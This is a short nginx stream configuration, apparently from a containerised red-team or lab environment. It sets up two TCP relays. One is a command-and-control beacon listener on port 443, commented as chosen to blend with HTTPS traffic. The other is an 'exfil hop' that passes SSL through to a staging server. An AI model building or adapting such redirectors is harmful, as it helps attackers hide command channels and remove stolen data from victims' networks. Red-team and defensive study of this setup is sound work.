worker_processes 1;

events {
    worker_connections 1024;
}

stream {
    resolver 127.0.0.11 valid=10s;

    # C2 beacon - listens on 443 to blend with HTTPS traffic
    server {
        listen 443;
        proxy_pass c2-server:9999;
        proxy_connect_timeout 10s;
        proxy_timeout         300s;
    }

    # Exfil hop - SSL passthrough to staging-server:8443
    server {
        listen 9443;
        proxy_pass staging-server:8443;
        proxy_connect_timeout 10s;
        proxy_timeout         300s;
    }
}
